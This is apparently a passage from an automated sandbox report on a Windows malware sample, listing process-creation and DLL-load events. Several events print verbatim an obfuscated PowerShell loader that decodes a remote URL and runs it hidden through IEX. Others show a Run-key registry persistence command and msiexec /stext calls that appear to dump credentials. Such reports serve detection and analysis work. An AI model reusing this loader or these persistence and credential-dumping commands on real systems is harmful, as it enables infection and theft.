';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.take LnnaDan dPerfePapfrDeo
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.tak
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qalgwws"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\avqzpodslp"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.take LnnaDan dPerfePapfrDeoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qalgwws"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\avqzpodslp"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)"Jump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
